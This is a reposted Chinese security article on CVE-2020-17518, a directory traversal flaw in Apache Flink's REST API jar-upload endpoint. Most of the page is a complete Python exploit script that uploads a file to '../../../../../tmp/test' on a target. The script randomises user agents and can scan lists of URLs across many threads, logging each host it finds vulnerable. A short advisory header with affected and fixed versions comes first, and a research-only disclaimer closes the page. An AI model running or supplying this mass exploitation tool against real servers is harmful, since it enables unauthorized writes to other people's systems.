Apache Flink目录遍历漏洞,可通过REST API读/写远程文件

admin
admin
admin
139164
文章
114
评论
2021年1月9日15:46:01评论248 views字数 2816阅读9分23秒阅读模式
Apache Flink目录遍历漏洞,可通过REST API读/写远程文件
进攻编号:
CVE-2020-17518

突破描述:
CVE-2020-17518:通过REST API写入远程文件

侵害的版本:
Flink 1.5.1-1.11.2

安全版本:
Flink 1.11.3或Flink 1.12.0

Flink 1.5.1发布了REST API,可通过恶意修改的HTTP HEADER,将任意文件复制到文件系统的任意位置。

用法:
狭窄:python CVE-2020-17518.py -u http:// IP:port
批量:python CVE-2020-17518.py -f url.txt

#-*- coding:utf-8 -*-banner = """        888888ba             dP                             88    `8b            88                            a88aaaa8P' .d8888b. d8888P .d8888b. dP    dP         88   `8b. 88'  `88   88   Y8ooooo. 88    88         88    .88 88.  .88   88         88 88.  .88         88888888P `88888P8   dP   `88888P' `88888P'    ooooooooooooooooooooooooooooooooooooooooooooooooooooo                 @time:2021/01/06 CVE-2020-17518.py                C0de by NebulabdSec - @batsu                   """print(banner)import threadpoolimport randomimport requestsimport argparseimport http.clientimport urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)http.client.HTTPConnection._http_vsn = 10http.client.HTTPConnection._http_vsn_str = 'HTTP/1.0'
payload_CMD  = '''test'''TARGET_URI = "/jars/upload'%2bsss"
def get_ua():    first_num = random.randint(55, 62)    third_num = random.randint(0, 3200)    fourth_num = random.randint(0, 140)    os_type = [        '(Windows NT 6.1; WOW64)', '(Windows NT 10.0; WOW64)', '(X11; Linux x86_64)',        '(Macintosh; Intel Mac OS X 10_12_6)'    ]    chrome_version = 'Chrome/{}.0.{}.{}'.format(first_num, third_num, fourth_num)
    ua = ' '.join(['Mozilla/5.0', random.choice(os_type), 'AppleWebKit/537.36',                   '(KHTML, like Gecko)', chrome_version, 'Safari/537.36']                  )    return ua
def CVE_2020_17518(url):    proxies = {"http":"http://127.0.0.1:8080"}    # proxies = {"scoks5": "http://127.0.0.1:1081"}    paramsMultipart = [('jarfile',                        ('../../../../../tmp/test', "{}rn".format(payload_CMD), 'application/octet-stream'))]
    headers = {        'User-Agent': get_ua(),        "Accept": "*/*"    }    targetUrl = url + TARGET_URI    try:        res = requests.post(targetUrl,                            files=paramsMultipart,                            headers=headers,                            timeout=15,                            verify=False,                            proxies=proxies)                            # proxies={'socks5': 'http://127.0.0.1:1081'})        if  len(res.text) == 25 and "Not found" in res.text and "errors" in res.text:            print("[+] URL:{}--------可能存在CVE-2020-17518漏洞".format(url))            with open("存在漏洞地址.txt", 'a') as fw:                fw.write(url + 'n')        else:            print("[-] " + url + " 没有发现CVE-2020-17518漏洞.n")    except Exception as e:        print(e)    except:        print("[-] " + url + " Request ERROR.n")
def multithreading(filename="ip.txt", pools=5):    works = []    with open(filename, "r") as f:        for i in f:            func_params = [i.rstrip("n")]            works.append((func_params, None))    pool = threadpool.ThreadPool(pools)    reqs = threadpool.makeRequests(CVE_2020_17518, works)    [pool.putRequest(req) for req in reqs]    pool.wait()
def main():    print("默认上传文件名为../../../../../tmp/test,内容为'''test'''")    parser = argparse.ArgumentParser()    parser.add_argument("-u",                        "--url",                        help="Target URL; Example:http://ip:port")    parser.add_argument("-f",                        "--file",                        help="Url File; Example:url.txt")    args = parser.parse_args()    url = args.url    file_path = args.file    if url != None and file_path ==None:        CVE_2020_17518(url)    elif url == None and file_path != None:        multithreading(file_path, 10)  # 默认15线程
if __name__ == "__main__":    main()












    

  • 



项目地址:https://github.com/QmF0c3UK/CVE-2020-17518




Apache Flink目录遍历漏洞,可通过REST API读/写远程文件





本文始发于微信公众号(Ots安全):Apache Flink目录遍历漏洞,可通过REST API读/写远程文件

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年1月9日15:46:01
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Apache Flink目录遍历漏洞,可通过REST API读/写远程文件https://cn-sec.com/archives/237132.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息